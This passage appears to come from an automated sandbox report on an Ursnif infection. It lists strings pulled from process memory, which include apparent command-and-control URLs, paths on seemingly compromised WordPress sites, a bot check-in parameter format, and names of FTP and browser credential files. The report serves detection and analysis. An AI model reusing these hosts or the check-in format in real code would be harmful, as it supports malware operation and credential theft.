              Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp | String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datMozilla
          Source: regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exe | String found in binary or memory: http://api.ipify.org
          Source: regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exe, 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp | String found in binary or memory: http://api.ipify.org0.0.0.0GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID=%I64u&BUILD=%
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://autopilotsales.in/wp-content/plugins/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://autopilotsales.in/wp-content/plugins/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://autopilotsales.in/wp-content/plugins/3
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/07
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/3
          Source: {79DD1813-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat.22.dr, ~DF883191F39C641F79.TMP.22.dr | String found in binary or memory: http://gaw.explik.at/webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uS
          Source: {5D34F2B6-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat.19.dr | String found in binary or memory: http://gaw.explik.at/webstore/kForBNOkuld/PMlfu1v0euSE_2/BxUhIJ7s_2Bzsa3aIvWWg/Plua7gYt6_2FPIim/H4Js
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp | String found in binary or memory: http://https://ftp://operawand.dat_Software
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmp | String found in binary or memory: http://ibexjade.ru/4/forum.php
          Source: svchost.exe | String found in binary or memory: http://ibexjade.ru/4/mlu/forum.php
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmp | String found in binary or memory: http://overnightfile.com/4/forum.php
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmp | String found in binary or memory: http://overnightfile.com/4/forum.php00715ysmLMEM8(
          Source: svchost.exe, 00000006.00000002.708220563.0000000002894000.00000004.00000001.sdmp | String found in binary or memory: http://overnightfile.com/4/forum.phpd
          Source: svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmp | String found in binary or memory: http://overnightfile.com/4/forum.phpect
          Source: svchost.exe | String found in binary or memory: http://overnightfile.com/mlu/forum.php
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp | String found in binary or memory: http://overnightfile.com/mlu/forum.phphttp://toolboxkasa.ru/mlu/forum.phphttp://ibexjade.ru/4/mlu/fo
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmp | String found in binary or memory: http://ss.ask.com/query?q=
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmp | String found in binary or memory: http://toolboxkasa.ru/4/forum.php
          Source: svchost.exe | String found in binary or memory: http://toolboxkasa.ru/mlu/forum.php
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: msapplication.xml.19.dr | String found in binary or memory: http://www.amazon.com/
          Source: msapplication.xml2.19.dr | String found in binary or memory: http://www.google.com/
          Source: svchost.exe, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
          Source: msapplication.xml3.19.dr | String found in binary or memory: http://www.live.com/
          Source: msapplication.xml4.19.dr | String found in binary or memory: http://www.nytimes.com/
          Source: msapplication.xml5.19.dr | String found in binary or memory: http://www.reddit.com/
          Source: msapplication.xml6.19.dr | String found in binary or memory: http://www.twitter.com/
          Source: msapplication.xml7.19.dr | String found in binary or memory: http://www.wikipedia.com/
          Source: msapplication.xml8.19.dr | String found in binary or memory: http://www.youtube.com/
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/obalSCAPE
          Source: svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/1nt
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/2https://accesoeducativo.com/wp-content/themes
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/3
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/32.23.43.1.4.9wtls9ECDHCryptOIDInfoECCParamete
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/x/1.16.1
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmp | String found in binary or memory: https://accesoeducativo.com/xplorer
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.aadrm.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.microsoftstream.com/api/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.onedrive.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://apis.live.net/v5.0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://app.powerbi.com/taskpane.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://augloop.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmp | String found in binary or memory: https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cdn.entity.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://clients.config.office.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://config.edge.skype.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://cr.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dataservice.o365filtering.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://devnull.onenote.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://directory.services.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://graph.ppe.windows.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://graph.ppe.windows.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://graph.windows.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://graph.windows.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://incidents.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://lifecycle.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.microsoftonline.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.microsoftonline.com/common
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.windows.local
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://management.azure.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://management.azure.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://messaging.office.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ncus-000.contentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ncus-000.pagecontentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://officeapps.live.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://onedrive.live.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://onedrive.live.com/embed?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://powerlift.acompli.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://retailer.osi.office.net/appstate/query
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmp | String found in binary or memory: https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://settings.outlook.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://shell.suite.office.com:1443
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmp | String found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/3
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmp | String found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/3w
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://skyapi.live.net/Activity/
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmp | String found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://store.office.cn/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://store.office.com/?productgroup=Outlook
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://store.office.com/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://store.office.de/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://tasks.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://templatelogging.office.com/client/log
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://web.microsoftstream.com/video/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://wus2-000.contentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://wus2-000.pagecontentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.dr | String found in binary or memory: https://www.odwebp.svc.ms
          Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
